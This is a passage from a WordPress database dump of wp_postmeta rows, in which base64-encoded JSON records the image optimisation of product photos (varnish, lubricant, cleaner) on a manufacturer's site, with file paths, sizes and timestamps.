3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTcxMiwiaWQiOjE0MDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNzE1LCJpZCI6MTQwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE3MTcsImlkIjoxNDAwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo3MCwidGltZSI6MTQ4MzU3MTcyMCwiaWQiOjE0MDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE3MjMsImlkIjoxNDAwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNzI1LCJpZCI6MTQwMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTcyOCwiaWQiOjE0MDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE3MzAsImlkIjoxNDAwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDUybi1wcm90ZWN0aXZlLXZhcm5pc2gtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NTJuLXByb3RlY3RpdmUtdmFybmlzaC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ1Mm4tcHJvdGVjdGl2ZS12YXJuaXNoLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNzMzLCJpZCI6MTQwMH1d'); 
INSERT INTO `wp_postmeta` VALUES (29545, 1399, 'wpfc_optimisation_reduction', '2136255'); 
INSERT INTO `wp_postmeta` VALUES (29546, 1399, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQuanBnIiwicmVkdWN0aW9uIjoyMTM1NzIxLCJ0aW1lIjoxNDgzNTcxNzQ1LCJpZCI6IjEzOTkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTM4MWgtY29ubmVjdG9yLWx1YnJpY2FudC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTM4MWgtY29ubmVjdG9yLWx1YnJpY2FudC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTM4MWgtY29ubmVjdG9yLWx1YnJpY2FudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTc0OCwiaWQiOjEzOTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNzUxLCJpZCI6MTM5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE3NTMsImlkIjoxMzk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTM4MWgtY29ubmVjdG9yLWx1YnJpY2FudC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTM4MWgtY29ubmVjdG9yLWx1YnJpY2FudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNzU3LCJpZCI6MTM5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE3NTksImlkIjoxMzk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTM4MWgtY29ubmVjdG9yLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTM4MWgtY29ubmVjdG9yLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTM4MWgtY29ubmVjdG9yLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTc2MiwiaWQiOjEzOTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNzY1LCJpZCI6MTM5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE3NjgsImlkIjoxMzk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoyMDcsInRpbWUiOjE0ODM1NzE3NzAsImlkIjoxMzk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxNDUsInRpbWUiOjE0ODM1NzE3NzMsImlkIjoxMzk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxNzEsInRpbWUiOjE0ODM1NzE3NzYsImlkIjoxMzk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMzgxaC1jb25uZWN0b3ItbHVicmljYW50LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNzc4LCJpZCI6MTM5OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTM4MWgtY29ubmVjdG9yLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTM4MWgtY29ubmVjdG9yLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTM4MWgtY29ubmVjdG9yLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTc4MSwiaWQiOjEzOTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0zODFoLWNvbm5lY3Rvci1sdWJyaWNhbnQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE3ODQsImlkIjoxMzk5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29547, 1398, 'wpfc_optimisation_reduction', '2173331'); 
INSERT INTO `wp_postmeta` VALUES (29548, 1398, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjgwLWlwYS1jbGVhbi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI4MC1pcGEtY2xlYW4uanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI4MC1pcGEtY2xlYW4uanBnIiwicmVkdWN0aW9uIjoyMTcyODUxLCJ0aW1lIjoxNDgzNTcxNzk1LCJpZCI6IjEzOTgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI4MC1pcGEtY2xlYW4tMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dw